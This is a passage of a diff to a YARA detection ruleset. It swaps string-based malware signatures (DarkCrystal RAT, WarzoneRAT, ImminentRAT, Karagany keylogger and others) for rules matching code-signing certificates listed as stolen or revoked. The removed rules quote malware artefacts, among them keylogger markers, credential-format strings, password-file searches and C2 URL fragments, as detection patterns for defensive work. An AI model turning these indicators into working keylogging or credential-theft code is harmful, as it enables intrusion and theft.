+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" )
 }
-rule DITEKSHEN_MALWARE_Win_Itranslatorexe : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_066276Af2F2C7E246D3B1Cab1B4Aa42E : FILE
 {
 	meta:
-		description = "Detects iTranslator EXE payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "763e8fa4-cf5c-54bc-9310-4e4171bf5a71"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "32b8e28b-361f-53e5-b06c-504dd9e86ae9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2854-L2874"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6405-L6416"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3c796d58cdf2d4dc4c838d05fb862640c7f9de6c7e8ebb5fb0002821354208d9"
+		logic_hash = "2a554105ae99de388621adefb2f53d2d0873ac3175ca2ccf00fc6a498ea2fd29"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.iTranslator_EXE"
-
-	strings:
-		$s1 = "\\itranslator\\wintrans.exe" fullword wide
-		$s2 = "\\SuperX\\SuperX\\Obj\\Release\\SharpX.pdb" fullword ascii
-		$s3 = "\\itranslator\\itranslator.dll" fullword ascii
-		$s4 = ":Intoskrnl.exe" fullword ascii
-		$s5 = "InjectDrv.sys" fullword ascii
-		$s6 = "SharpX.dll" fullword wide
-		$s7 = "GetMicrosoftEdgeProcessId" ascii
-		$s8 = ".php?type=is&ch=" ascii
-		$s9 = ".php?uid=" ascii
-		$s10 = "&mc=" fullword ascii
-		$s11 = "&os=" fullword ascii
-		$s12 = "&x=32" fullword ascii
+		thumbprint = "dee5ca4be94a8737c85bbee27bd9d81b235fb700"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" )
 }
-rule DITEKSHEN_MALWARE_Win_Itranslatordll : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_289051A83F350A2C600187C99B6C0A73 : FILE
 {
 	meta:
-		description = "Detects iTranslator DLL payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df05da78-3626-5eb5-81a2-a93fba844484"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f84a7749-a487-52e5-813b-e376ccde13d1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2876-L2892"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6418-L6429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca0479efd241058f358553b6382a1987a5b4c069965f4adb88cd2f3fc4bef21a"
+		logic_hash = "f094e923dc53cc1edc6ac83cf69fb60fd3c564606a5bfb68facb482918399799"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.iTranslator_DLL"
-
-	strings:
-		$d1 = "system32\\drivers\\%S.sys" fullword wide
-		$d2 = "\\windows\\system32\\winlogon.exe" fullword ascii
-		$d3 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\%s" fullword wide
-		$d4 = "\\Registry\\Machine\\SYSTEM\\ControlSet001\\services\\webssx" fullword wide
-		$d5 = "\\Device\\CtrlSM" fullword wide
-		$d6 = "\\DosDevices\\CtrlSM" fullword wide
-		$d7 = "\\driver_wfp\\CbFlt\\Bin\\CbFlt.pdb" ascii
-		$d8 = ".php" ascii
+		thumbprint = "4e075adea8c1bcb9d10904203ab81965f4912ff0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" )
 }
-rule DITEKSHEN_MALWWARE_Win_Octopus : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_25A28E418Ef2D55B87Ee715B42Afbedb : FILE
 {
 	meta:
-		description = "Detects Octopus trojan payload"
+		description = "VMProtect Software CA Certificate"
 		author = "ditekSHen"
-		id = "eb092e23-864f-52f3-bfa4-7e3c616d3984"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "dc0b80f1-c720-5d83-a92b-144b1fd05138"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2894-L2917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6431-L6442"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "012b75c94be3021dbcc5b8e8bd62f807c9aa8bc0df94f830a5294aaf0d21b9fc"
+		logic_hash = "be40d3b202b400eda7e78280b674823f789e292a35f0892ab3a323d1b055e789"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Octopus"
-
-	strings:
-		$s1 = "\\Mozilla\\Firefox\\Profiles\\" fullword wide
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
-		$s3 = "\\wbem\\WMIC.exe" fullword wide
-		$s4 = ".profiles.ini" fullword wide
-		$s5 = "PushEBP_" ascii
-		$s6 = "MovEBP_ESP_" ascii
-		$s7 = "Embarcadero Delphi for Win32 compiler" ascii
-		$s8 = "TempWmicBatchFile.bat" fullword wide
-		$wq1 = "computersystem get Name /format:list" wide
-		$wq2 = "os get installdate /format:list" wide
-		$wq3 = "get serialnumber /format:list" wide
-		$wq4 = "\\\\\\\\.\\\\PHYSICALDRIVE" wide
-		$wq5 = "path CIM_LogicalDiskBasedOnPartition" wide
-		$wq6 = "get Antecedent,Dependent" wide
-		$wq7 = "path win32_physicalmedia" wide
+		thumbprint = "14e375bd4a40ddd3310e05328dda16e84bac6d34"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) and 5 of ( $wq* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:a2:8e:41:8e:f2:d5:5b:87:ee:71:5b:42:af:be:db" )
 }
-rule DITEKSHEN_MALWARE_Win_Caspertroy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Vmprotect_Client : FILE
 {
 	meta:
-		description = "Detects CasperTroy payload"
+		description = "VMProtect Client Certificate"
 		author = "ditekSHen"
-		id = "822c3231-60ba-5e60-8df8-06dea80b318a"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "f9fd6478-0fe5-54b6-ba33-79c02eb9ad04"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2919-L2931"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6444-L6455"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ce070b1e6279ef9fa47f84da7c5166cd93b3e7a0f95541ae14c048b2af9bc431"
+		logic_hash = "d55d9fe608d5ff357a3bcf700a3d8bd9556f83c7c792b50d2276228a77209346"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DllTroy.dll" fullword ascii
-		$s2 = "Content-Disposition: form-data; name=\"image\"; filename=\"title.gif\"" fullword ascii
-		$s3 = "Content-Disposition: form-data; name=\"COOKIE_ID\"" fullword ascii
-		$s4 = "Content-Disposition: form-data; name=\"PHP_SESS_ID\"" fullword ascii
-		$s5 = "Content-Disposition: form-data; name=\"SESS_ID\"" fullword ascii
+		thumbprint1 = "2e20b7079e5d83e7987b2605db160d1561a0c07a"
+		hash1 = "284dc48fc2a66a1071117e5f7b2ad68fba4aae69f31cf68b6b950e6205b52dc0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VMProtect Client " )
 }
-rule DITEKSHEN_MALWARE_Win_Rasftuby : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_44Fe73F320Aa8B7B4F5Ca910Aa22333A : FILE
 {
 	meta:
-		description = "Detects Rasftuby/DarkCrystal"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "908624a8-0068-5512-a5d0-77ce1f4efd80"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "fb7a2f49-d5b4-59af-b64b-27624ff18323"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2933-L2950"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6457-L6468"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b769c1986d23173cf8a8a3c8a14d388a7c0327e46d936fc97c449dc55f2a5575"
+		logic_hash = "a456cd32eed6c1f037bc565e7a43f2a5a2237749afc31f6b7a8b8d7a657973c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DarkCrystal.RAT-Rasftuby"
-
-	strings:
-		$s1 = "/DCRS/main.php?data=active" fullword ascii wide
-		$s2 = "/socket.php?type=__ds_" ascii wide
-		$s3 = "/uploader.php" fullword ascii wide
-		$s4 = "del \\\"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\System.lnk\\\"" fullword ascii wide
-		$s5 = "Host:{0},Port:{1},User:{2},Pass:{3}<STR>" fullword ascii wide
-		$s6 = "keyloggerstart_status" fullword ascii wide
-		$s7 = "keyloggerstop_status" fullword ascii wide
-		$s8 = "[PRINT SCREEN]" fullword ascii wide
-		$s9 = "DCS.Internal" ascii
+		thumbprint = "e952eb51416ab15c0a38b64a32348ed40b675043"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alpeks LLC" and pe.signatures [ i ] . serial == "44:fe:73:f3:20:aa:8b:7b:4f:5c:a9:10:aa:22:33:3a" )
 }
-rule DITEKSHEN_MALWARE_Win_Protonbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Df45B36C9D0Bd248C3F9494E7Ca822 : FILE
 {
 	meta:
-		description = "Detects ProtonBot loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b0d08378-0297-5e70-99f1-1dc0fec6fa01"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "95100ec5-01bf-5a5a-a703-b10d320beed1"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2952-L2969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6470-L6481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b511dfd47109d36ffc7fcb23b49779e1164d50a28061ab724d7a2c744ac23ac8"
+		logic_hash = "40f4ad4183ca0bc76295c535a9286994ef0e3f8ac932372328016d543bb58ab5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ProtonBot"
-
-	strings:
-		$x1 = "\\PROTON\\Release\\build.pdb" ascii
-		$x2 = "\\proton\\proton bot\\json.hpp" wide
-		$x3 = "proton bot" ascii wide
-		$s1 = "endptr == token_buffer.data() + token_buffer.size()" fullword wide
-		$s2 = "ranges.size() == 2 or ranges.size() == 4 or ranges.size() == 6" fullword wide
-		$s3 = "ref_stack.back()->is_array() or ref_stack.back()->is_object()" fullword wide
-		$s4 = "ktmw32.dll" fullword ascii
-		$s5 = "@detail@nlohmann@@" ascii
-		$s6 = "urlmon.dll" fullword ascii
+		thumbprint = "4b1efa2410d9aab12af6c0b624a3738dd06d3353"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" )
 }
-rule DITEKSHEN_MALWARE_Win_Imminentrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Adbb8Aebf8B53C6713Abaca38Be9Bf0A : FILE
 {
 	meta:
-		description = "Detects ImminentRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "99831b32-d8a0-5814-bf41-491f607ee825"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b3edea3e-8844-58a5-a600-b0695869b2c3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2971-L2994"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6483-L6497"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f959fd28e818b17c962fcd5bb99fa5ac0058f22494950e0200f139703f3e756a"
+		logic_hash = "d5e85240df57bf3b5ec4f690943f71609aaf2fb2f751b2919b6024b4247cd571"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "abuse@imminentmethods.net" ascii
-		$x2 = "Imminent-Monitor-" ascii
-		$x3 = "AddressChangeListener" fullword ascii
-		$x4 = "SevenZipHelper" fullword ascii
-		$x5 = "WrapNonExceptionThrows" fullword ascii
-		$s1 = "_ENABLE_PROFILING" wide
-		$s2 = "Anti-Virus: {0}" wide
-		$s3 = "File downloaded & executed" wide
-		$s4 = "Chat - You are speaking with" wide
-		$s5 = "\\Imminent\\Plugins" wide
-		$s6 = "\\Imminent\\Path.dat" wide
-		$s7 = "\\Imminent\\Geo.dat" wide
-		$s8 = "DisableTaskManager = {0}" wide
-		$s9 = "This client is already mining" wide
-		$s10 = "Couldn't get AV!" wide
-		$s11 = "Couldn't get FW!" wide
+		thumbprint = "9f9b9f5a85d3005e4c613b6c2ba20b6d5d388645"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Konstant LLC" and ( pe.signatures [ i ] . serial == "ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" or pe.signatures [ i ] . serial == "00:ad:bb:8a:eb:f8:b5:3c:67:13:ab:ac:a3:8b:e9:bf:0a" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Warzonerat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Ffc9825644Caf5B1F521780C5C7F42C : FILE
 {
 	meta:
-		description = "Detects AveMaria/WarzoneRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4f3df696-280c-5f2b-9511-8cc7c9dff1d6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b9ed2db5-b7d4-5d74-bb11-1e8b1dfe1648"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2996-L3011"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6499-L6510"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1af8b0f90b0de3287499082a6d6d9da6ed62a3110018e0c0f7149353693060b2"
+		logic_hash = "9866608a02a043e6873c6fbd231cd733b3b5a1e5b77e3205e5cf53f5ae2bcadd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "RDPClip" fullword wide
-		$s2 = "Grabber" fullword wide
-		$s3 = "Ave_Maria Stealer OpenSource" wide
-		$s4 = "\\MidgetPorn\\workspace\\MsgBox.exe" wide
-		$s5 = "@\\cmd.exe" wide
-		$s6 = "/n:%temp%\\ellocnak.xml" wide
-		$s7 = "Hey I'm Admin" wide
-		$s8 = "warzone160" fullword ascii
+		thumbprint = "4e7e022c7bb6bd90a75674a67f82e839d54a0a5e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTIVUS LIMITED" and pe.signatures [ i ] . serial == "1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganycore : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3112C69D460C781Fd649C71E61Bfec82 : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost core plugin"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c066805b-9373-5524-aff9-d16cd59f5a24"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "a8092e36-92f9-5cb0-a427-74d40a39d94f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3013-L3027"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6512-L6523"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cde96ac6477fda1312ce4f7532018c9f11df7d39c40155d10bdde0e3d84c6d57"
+		logic_hash = "9662a01369bc01367bcae7813b3fcb3050721471dd247885bcab8918de7c6b99"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "127.0.0.1" fullword ascii
-		$s2 = "port" fullword ascii
-		$s3 = "C:\\Windows\\System32\\Kernel32.dll" fullword ascii
-		$s4 = "kernel32.dll" fullword ascii
-		$s5 = "http" ascii
-		$s6 = "Move" fullword ascii
-		$s7 = "<supportedOS Id=\"{" ascii
+		thumbprint = "7ec961d2c69f7686e33f39d497a5e3039e512cf3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganykeylogger : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F64E5B34Dc0E4893495D3B9Fd9Cde4B7 : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost keylogger plugin"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dd14ede0-7132-5b7f-872a-d96d5275a8e4"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "d408b662-6328-55a8-ab64-42ea8f18c1cf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3029-L3041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6525-L6536"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7f1f5b2ca67e62380c8a8095fed4a4fd76d7bc15c9fe2d76e780ad85f886ef7b"
+		logic_hash = "497e63e4a19fa5b05d1098177dc73ae2255d4608d97e1001461dc4f8edced169"
 		score = 75
-		quality = 23
+		quality = 75
 		tags = "FILE"
+		thumbprint = "49373674eb2190c227455c9b5833825fe01f957a"
+		importance = 20
 
-	strings:
-		$s1 = "__klg__" fullword wide
-		$s2 = "__klgkillsoft__" fullword wide
-		$s3 = "CLIPBOARD_PASTE" wide
-		$s4 = "%s\\k%d.txt" wide
-		$s5 = "\\Update\\Tmp" wide
+	condition:
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMASoft" and pe.signatures [ i ] . serial == "f6:4e:5b:34:dc:0e:48:93:49:5d:3b:9f:d9:cd:e4:b7" )
+}
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6Bec31A0A40D2E834E51Ae704E1Bf9D3 : FILE
+{
+	meta:
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "9228c13e-b380-5867-ad1f-e483c8977196"
+		date = "2020-11-19"
+		modified = "2024-10-04"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6538-L6549"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "f1fdd6e76deea106db9fc4ef0916b2cecd6edb3849847946f15c194a9028a76e"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "7a236872302156c58d493b63a1607a09c4f1d0b8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "whatsupfuckers" and pe.signatures [ i ] . serial == "6b:ec:31:a0:a4:0d:2e:83:4e:51:ae:70:4e:1b:f9:d3" )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganyscreenutil : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_9Fac361Ee3304079 : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost ScreenUtil module"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5eab1bb9-a433-54e6-963b-4aca863dc73f"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "4143adb3-bd23-549c-b862-0db3583be161"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3043-L3055"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6551-L6565"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d10230d94adfdddd604e2569ae3323efa1d5722647b9c704fceefe9446ccebd1"
+		logic_hash = "a32fe70e2242e587007c3985420c3bea25d35aff37f62881cc386bdeff22ca93"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "__pic__" ascii wide
-		$s2 = "__pickill__" ascii wide
-		$s3 = "\\picture.png" fullword wide
-		$s4 = "%d.jpg" wide
-		$s5 = "\\Update\\Tmp" wide
+		thumbprint = "2168032804def9cdbc1fc1a669377d494832f4ec"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and ( pe.signatures [ i ] . serial == "9f:ac:36:1e:e3:30:40:79" or pe.signatures [ i ] . serial == "00:9f:ac:36:1e:e3:30:40:79" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Karaganylistrix : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1895De749994D0Db : FILE
 {
 	meta:
-		description = "Detects Karagany/xFrost Listrix module"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "837cc9e7-eefb-530c-854b-51bb4444ae78"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2a8129ac-9838-5798-a115-ec03c1b3c205"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3057-L3069"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6567-L6578"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "02216061dbe93b7bea108f4b27c052d87c14cfe9395c6c5d4eed46ed7819e7ae"
+		logic_hash = "0b5e7998bd6303a12a8681bca88b7802caa08d9272196b830ffac5573b6e3772"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\Update\\Tmp\\" wide
-		$s2 = "*pass*.*" fullword wide
-		$s3 = ">> NUL" wide
-		$s4 = "%02d.%02d.%04d %02d:%02d" wide
-		$s5 = "/c del" wide
+		thumbprint = "069b9cb52a325a829aba7731ead939bc4ebf3743"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "18:95:de:74:99:94:d0:db" )
 }
-rule DITEKSHEN_MALWARE_Osx_Macsearch : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_28B691272719B1Ee : FILE
 {
 	meta:
-		description = "Detects MacSearch adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "facdf05c-5ee4-54c6-9ca3-01978af2b6e6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5a8cf540-701f-5f94-b630-ccbaa62abfdd"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3071-L3092"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6580-L6591"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "973b7215fc8d04685a46d05b53b4092e7b81ed0d64d6982b534f2b89d0a59443"
+		logic_hash = "b2224f8107e7c50334c7e12963e4e37c0a6824c49842afb314c12d6de9d6bc5e"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "open -a safari" ascii
-		$s2 = "/INDownloader" ascii
-		$s3 = "/safefinder" ascii
